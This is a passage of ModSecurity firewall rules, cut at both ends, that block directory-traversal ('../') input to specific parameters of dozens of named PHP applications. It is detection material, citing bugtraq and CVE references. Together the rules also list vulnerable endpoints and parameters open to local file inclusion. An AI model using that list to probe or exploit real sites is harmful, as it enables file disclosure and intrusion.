"chain" SecRule ARGS:pfadhier "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Papoo CMS message_class.php pfadhier Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008687) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PassWiki site_id Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /passwiki.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008687,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PassWiki site_id Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29455'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:site_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PassWiki site_id Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PowerPHPBoard footer.inc.php settings Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /footer.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009659,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PowerPHPBoard footer.inc.php settings Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28421'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:settings[footer] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PowerPHPBoard footer.inc.php settings Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009660) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PowerPHPBoard header.inc.php settings Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /header.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009660,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PowerPHPBoard header.inc.php settings Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28421'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:settings[header] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PowerPHPBoard header.inc.php settings Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008880) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PunBB Functions_navlinks.php pun_user language Parameter Local File Inclusion SecRule REQUEST_LINE "@contains functions_navlinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008880,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PunBB Functions_navlinks.php pun_user language Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32360'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:pun_user[language]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PunBB Functions_navlinks.php pun_user language Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008881) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PunBB profile_send.php pun_user language Parameter Local File Inclusion SecRule REQUEST_LINE "@contains profile_send.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008881,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PunBB profile_send.php pun_user language Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32360'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:pun_user[language]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PunBB profile_send.php pun_user language Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008882) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PunBB viewtopic_PM-link.php pun_user language Parameter Local File Inclusion SecRule REQUEST_LINE "@contains viewtopic_PM-link.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008882,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PunBB viewtopic_PM-link.php pun_user language Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32360'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:pun_user[language]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PunBB viewtopic_PM-link.php pun_user language Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009503) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /server_request.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009503,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,27945'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:CONFIG[gameroot] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009505) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /qlib/smarty.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009505,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,27945'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:CONFIG[gameroot] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009746) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /qte_web.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009746,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:qte_web_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009724) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS QuickTeam qte_init.php qte_root Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /bin/qte_init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009724,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS QuickTeam qte_init.php qte_root Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:qte_root "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS QuickTeam qte_init.php qte_root Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009018) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Text Lines Rearrange Script filename parameter File Disclosure SecRule REQUEST_LINE "@contains /download.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009018,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Text Lines Rearrange Script filename parameter File Disclosure',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:filename/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Text Lines Rearrange Script filename parameter File Disclosure',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008652) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ScriptsEz Easy Image Downloader id File Disclosure SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008652,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ScriptsEz Easy Image Downloader id File Disclosure',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/6715'" SecRule REQUEST_LINE "@contains main.php?action=download" "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:&id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ScriptsEz Easy Image Downloader id File Disclosure',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009070) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpSkelSite TplSuffix parameter local file inclusion SecRule REQUEST_LINE "@contains /login.tpl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009070,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpSkelSite TplSuffix parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,33092'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:TplSuffix "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpSkelSite TplSuffix parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009181) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /vars.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009181,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:_SESSION[SCRIPT_PATH] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009182) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /pcltar.lib.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009182,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:g_pcltar_lib_dir "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009145) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Syntax Desktop preview.php synTarget Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /preview.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009145,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Syntax Desktop preview.php synTarget Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33601'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:synTarget "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Syntax Desktop preview.php synTarget Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009230) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Local File Inclusion SecRule REQUEST_LINE "@contains /body_default.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009230,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Local File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2009-0441'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:shop_this_skin_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009169) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Thyme export.php export_to Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /export.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009169,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Thyme export.php export_to Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33731'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:export_to "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Thyme export.php export_to Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009789) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TinyButStrong bs_us_examples_0view.php script Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /examples/tbs_us_examples_0view.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009789,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TinyButStrong bs_us_examples_0view.php script Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:script "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TinyButStrong bs_us_examples_0view.php script Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009726) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /config.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009726,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34617'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:inc_dir "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009729) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TotalCalendar cms_detect.php include Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /cms_detect.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009729,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TotalCalendar cms_detect.php include Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34634'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:include "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TotalCalendar cms_detect.php include Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008923) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TxtBlog index.php m Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008923,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TxtBlog index.php m Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32498'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:m/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TxtBlog index.php m Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2010127) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /include/timesheet.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010127,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:config[include_dir] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2010255) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ve-EDIT debug_php.php _GET Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /debugger/debug_php.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010255,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Ve-EDIT debug_php.php _GET Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:_GET[filename] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ve-EDIT debug_php.php _GET Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009306) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009306,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:include_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009308) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /ST_browsers.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009308,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:include_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009310) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /ST_countries.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009310,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:include_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009312) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /ST_platforms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009312,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:include_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009010) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress Plugin Page Flip Image Gallery getConfig.php book_id parameter Remote File Disclosure SecRule REQUEST_LINE "@contains /books/getConfig.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009010,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress Plugin Page Flip Image Gallery getConfig.php book_id parameter Remote File Disclosure',tag:'web-application-attack',tag:'bugtraq,32966'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule QUERY_STRING|REQUEST_BODY "@contains book_id=" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:(\.\.\/){1,})" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress Plugin Page Flip Image Gallery getConfig.php book_id parameter Remote File Disclosure',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009926) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /includes/function_core.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009926,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,31225'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:web_root "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009928) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Local file Inclusion SecRule REQUEST_LINE "@contains /templates/layout_lyrics.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009928,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Local file Inclusion',tag:'web-application-attack',tag:'bugtraq,31225'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:web_root "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Local file Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009194) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS X7 Chat mini.php help_file Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /mini.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009194,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS X7 Chat mini.php help_file Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,31460'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:help_file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS X7 Chat mini.php help_file Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009191) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS YACS update_trailer.php context Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /update_trailer.php" 